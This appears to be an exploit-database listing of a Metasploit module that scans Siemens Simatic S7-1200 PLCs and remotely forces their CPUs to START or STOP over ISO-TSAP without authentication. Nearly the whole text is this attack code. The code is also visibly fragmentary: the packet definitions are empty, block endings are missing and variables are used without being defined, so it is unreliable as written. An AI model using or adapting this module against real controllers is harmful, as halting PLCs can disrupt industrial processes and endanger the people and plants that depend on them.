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Siemens Simatic S7 1200 CPU Command Module (MSF)
来源:tdh.mhung@gmail.com 作者:Hung 发布时间:2015-12-15  
# Exploit Title:  Simatic S7 1200 CPU command module
# Date: 15-12-2015
# Exploit Author: Nguyen Manh Hung
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1214C
# CVE : None
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
    include Msf::Exploit::Remote::Tcp
    include Msf::Auxiliary::Scanner
    def initialize(info = {})
            'Name'=> 'Simatic S7-1200 CPU START/STOP Module',
            'Description'   => %q{
                Update 2015
                The Siemens Simatic S7-1200 S7 CPU start and stop functions over ISO-TSAP.
            'Author'      => 'Nguyen Manh Hung <tdh.mhung@gmail.com>',
            'License'           => MSF_LICENSE,
            'References'     =>
                    [ 'nil' ],
            'Version'        => '$Revision$',
            'DisclosureDate' => '11-2015'
                    OptString.new('MODE', [true, 'Mode select:
                    START -- start PLC
                    STOP  -- stop PLC
                    SCAN  -- PLC scanner',"SCAN"]),
                ], self.class)
    def packet()
        packets=[       #dua tren TIA portal thay cho hello plc
                        #session debug
                        #bat dau qua trinh diag
                        #tiep tuc diag
#truoc start-stop
        return packets
    def start_PLC(scr)
        print_good "mode select: START"
        sock.put(packet[6].gsub("\xff",[scr].pack("c")))#send hello plc
        sock.put(packet[7].gsub("\xff",[scr].pack("c")))#send hello plc
        dt=sock.get_once(-1, sock.def_read_timeout)
        if dt.length.to_i == 30
            print_good "PLC---->RUN"
            a= dt.to_s.gsub(/[\x80-\xff]/," ")
            print_error a.to_s.gsub(/[\x00-\x30]/," ")
    def stop_PLC(scr)
        print_good "mode select: STOP"
        sock.put(packet[6].gsub("\xff",[scr].pack("c")))#send hello plc
        sock.put(packet[8].gsub("\xff",[scr].pack("c")))#send hello plc
        dt=sock.get_once(-1, sock.def_read_timeout)
        if dt.length.to_i == 30
            print_good "PLC---->STOP"
            a= dt.to_s.gsub(/[\x80-\xff]/," ")
            print_error a.to_s.gsub(/[\x00-\x30]/," ")
    def PLC_SCAN(ip)
        sock.put(packet[0])#send hello plc
        sock.put(packet[1])#xin 1 session debug
        dt=sock.get_once(-1, sock.def_read_timeout)
        sock.put(packet[3])#send hello plc
        print_good "#{ip.to_s}:  #{arr[2].to_s} : #{arr[3][0..3].to_s}"
    def run_host(ip)
        if mode !="scan" && mode!="SCAN"
            sock.put(packet[0])#send hello plc
            sock.put(packet[1])#xin 1 session debug
            dt=sock.get_once(-1, sock.def_read_timeout)
            sock.put(packet[3])#send hello plc
            print_good "#{arr[2].to_s} : #{arr[3][0..3].to_s}"
            a= (data[24]).to_i
            b= (data[26]).to_i
            #print_line scr.to_s
            if arr.length.to_i ==5 #neu lay duoc session
                session_i= arr[4][0..4].each_byte.map { |dt| '\x%02x' % dt.to_i }.join
                sock.put(pac.gsub("\x35\x34\x34\x82\x41", arr[4][0..4]))
            sock.put(packet[3])#send uknown packet to plc
            case mode
                when "START" , "start"
                when "STOP" , "stop"
                    print_error("Invalid MODE")
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